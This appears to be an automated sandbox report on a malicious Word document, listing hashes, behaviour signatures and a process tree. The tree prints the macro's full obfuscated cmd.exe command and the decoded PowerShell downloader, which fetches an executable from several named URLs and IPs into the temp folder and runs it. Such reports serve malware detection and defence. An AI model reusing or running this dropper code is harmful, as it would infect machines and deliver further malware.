Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    04-06-2024 04:10

General

  • Target

    93962c49f6d160592f2a9153880877e7_JaffaCakes118.doc

  • Size

    136KB

  • MD5

    93962c49f6d160592f2a9153880877e7

  • SHA1

    ec4bc19605963436b8d6e1dff29691635df8c033

  • SHA256

    1b11eb3250e38969955bc7b5029ec6d82d8a0bb0ac009c7d53290efb491fc85e

  • SHA512

    61ef73afe2efdf76b759e94ff3cf9cd1dc0e363234d270e0f57e9d7c1a420f3c490e951ef44a036f19cd4588098c9e45e5e54a27b97c543fb0219b625833e76a

  • SSDEEP

    1536:Vwt81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9uD5C5kVH0PdG:M8GhDS0o9zTGOZD6EbzCd9mWFG

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\93962c49f6d160592f2a9153880877e7_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2216
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2936
      • \??\c:\windows\SysWOW64\cmd.exe
        c:\ZvZIAvmzCjBEfb\jzcdOqjj\DwmMQqivItVPXC\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set sLYG=cMzBJfzGbhspuTRPiRmnWwXErcuoTrfw F,HV(j/$Nq{-L'0yKt\g.CS@4Ilk87}e+2=3dZ)A:1DOvYx;a6&&for %R in (40,17,29,76,67,46,60,35,16,46,80,40,42,41,42,67,19,64,31,44,27,8,38,64,25,50,32,41,64,50,53,20,64,8,54,59,16,64,19,50,80,40,54,55,70,67,46,9,50,50,11,73,39,39,16,11,50,77,29,64,10,64,59,59,64,29,53,25,27,18,39,70,79,31,23,56,9,50,50,11,73,39,39,74,68,53,74,66,62,53,74,66,82,53,66,57,66,39,25,54,78,78,78,56,9,50,50,11,73,39,39,74,68,53,66,66,61,53,74,47,47,53,74,68,66,39,9,33,49,41,41,81,75,1,56,9,50,50,11,73,39,39,64,29,16,25,59,64,77,64,19,50,9,81,59,53,25,27,18,39,77,76,26,56,9,50,50,11,73,39,39,31,31,31,53,10,69,77,64,52,81,19,64,25,27,30,29,16,64,19,69,59,48,53,25,27,18,39,33,3,46,53,55,11,59,16,50,37,46,56,46,71,80,40,19,75,1,67,46,28,19,6,46,80,40,9,16,25,32,67,32,46,82,62,57,46,80,40,19,26,11,67,46,29,30,18,46,80,40,1,42,16,67,40,64,19,77,73,50,64,18,11,65,46,51,46,65,40,9,16,25,65,46,53,64,79,64,46,80,30,27,29,64,81,25,9,37,40,60,10,69,32,16,19,32,40,54,55,70,71,43,50,29,48,43,40,42,41,42,53,75,27,31,19,59,27,81,69,33,16,59,64,37,40,60,10,69,34,32,40,1,42,16,71,80,40,9,17,16,67,46,36,45,6,46,80,58,30,32,37,37,7,64,50,44,58,50,64,18,32,40,1,42,16,71,53,59,64,19,52,50,9,32,44,52,64,32,61,47,47,47,47,71,32,43,58,19,77,27,60,64,44,58,50,64,18,32,40,1,42,16,80,40,6,1,6,67,46,16,81,26,46,80,8,29,64,81,60,80,63,63,25,81,50,25,9,43,63,63,40,69,1,38,67,46,3,72,70,46,80,91)do set 4Wx1=!4Wx1!!sLYG:~%R,1!&&if %R==91 echo !4Wx1:~-440!|FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^^^|find "Cons"')DO %C -"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2616
        • C:\Windows\SysWOW64\cmd.exe
          CmD /V:ON/C"set sLYG=cMzBJfzGbhspuTRPiRmnWwXErcuoTrfw F,HV(j/$Nq{-L'0yKt\g.CS@4Ilk87}e+2=3dZ)A:1DOvYx;a6&&for %R in (40,17,29,76,67,46,60,35,16,46,80,40,42,41,42,67,19,64,31,44,27,8,38,64,25,50,32,41,64,50,53,20,64,8,54,59,16,64,19,50,80,40,54,55,70,67,46,9,50,50,11,73,39,39,16,11,50,77,29,64,10,64,59,59,64,29,53,25,27,18,39,70,79,31,23,56,9,50,50,11,73,39,39,74,68,53,74,66,62,53,74,66,82,53,66,57,66,39,25,54,78,78,78,56,9,50,50,11,73,39,39,74,68,53,66,66,61,53,74,47,47,53,74,68,66,39,9,33,49,41,41,81,75,1,56,9,50,50,11,73,39,39,64,29,16,25,59,64,77,64,19,50,9,81,59,53,25,27,18,39,77,76,26,56,9,50,50,11,73,39,39,31,31,31,53,10,69,77,64,52,81,19,64,25,27,30,29,16,64,19,69,59,48,53,25,27,18,39,33,3,46,53,55,11,59,16,50,37,46,56,46,71,80,40,19,75,1,67,46,28,19,6,46,80,40,9,16,25,32,67,32,46,82,62,57,46,80,40,19,26,11,67,46,29,30,18,46,80,40,1,42,16,67,40,64,19,77,73,50,64,18,11,65,46,51,46,65,40,9,16,25,65,46,53,64,79,64,46,80,30,27,29,64,81,25,9,37,40,60,10,69,32,16,19,32,40,54,55,70,71,43,50,29,48,43,40,42,41,42,53,75,27,31,19,59,27,81,69,33,16,59,64,37,40,60,10,69,34,32,40,1,42,16,71,80,40,9,17,16,67,46,36,45,6,46,80,58,30,32,37,37,7,64,50,44,58,50,64,18,32,40,1,42,16,71,53,59,64,19,52,50,9,32,44,52,64,32,61,47,47,47,47,71,32,43,58,19,77,27,60,64,44,58,50,64,18,32,40,1,42,16,80,40,6,1,6,67,46,16,81,26,46,80,8,29,64,81,60,80,63,63,25,81,50,25,9,43,63,63,40,69,1,38,67,46,3,72,70,46,80,91)do set 4Wx1=!4Wx1!!sLYG:~%R,1!&&if %R==91 echo !4Wx1:~-440!|FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^^^|find "Cons"')DO %C -"
          3⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • Suspicious use of WriteProcessMemory
          PID:2792
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $RrO='kHi';$qNq=new-object Net.WebClient;$CSZ='http://iptvreseller.com/ZxwE@http://13.127.126.242/cCYYY@http://13.228.100.132/hFKNNaDM@http://ericleventhal.com/vOu@http://www.sdveganecofriendly.com/FB'.Split('@');$nDM='Tnz';$hic = '674';$nup='rfm';$Mqi=$env:temp+'\'+$hic+'.exe';foreach($ksd in $CSZ){try{$qNq.DownloadFile($ksd, $Mqi);$hRi='VLz';If ((Get-Item $Mqi).length -ge 80000) {Invoke-Item $Mqi;$zMz='iau';break;}}catch{}}$dMj='BAZ';"
            4⤵
              PID:2412
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^|find "Cons"') DO %C -"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2420
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ftype|find "Cons"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2444
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" ftype"
                  6⤵
                    PID:2472
                  • C:\Windows\SysWOW64\find.exe
                    find "Cons"
                    6⤵
                      PID:2520
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -
                    5⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2872

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
            Filesize

            20KB

            MD5

            20eec9961eedfea17b339fe7e6f3a89d

            SHA1

            8918ed7c6a8bc7c05f4cc3e13dbf366035998170

            SHA256

            b682b8ea2db3ea56a1527668f390fa217ce1a33df6661c67810caddbfcd96e09

            SHA512

            706564ca4b27aabd9652bed404e88ecd92c2ae23b63a6adf8e89d6203c89d289114fca59251cfcf81ebd89b579b03621993dce20d7c84ab0715f38643998a267

          • memory/2216-0-0x000000002F811000-0x000000002F812000-memory.dmp
            Filesize

            4KB

          • memory/2216-2-0x000000007122D000-0x0000000071238000-memory.dmp
            Filesize

            44KB

          • memory/2216-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

          • memory/2216-7-0x0000000000370000-0x0000000000470000-memory.dmp
            Filesize

            1024KB

          • memory/2216-8-0x0000000000370000-0x0000000000470000-memory.dmp
            Filesize

            1024KB

          • memory/2216-6-0x0000000000370000-0x0000000000470000-memory.dmp
            Filesize

            1024KB

          • memory/2216-16-0x000000007122D000-0x0000000071238000-memory.dmp
            Filesize

            44KB

          • memory/2216-17-0x0000000000370000-0x0000000000470000-memory.dmp
            Filesize

            1024KB

          • memory/2216-33-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

          • memory/2216-34-0x000000007122D000-0x0000000071238000-memory.dmp
            Filesize

            44KB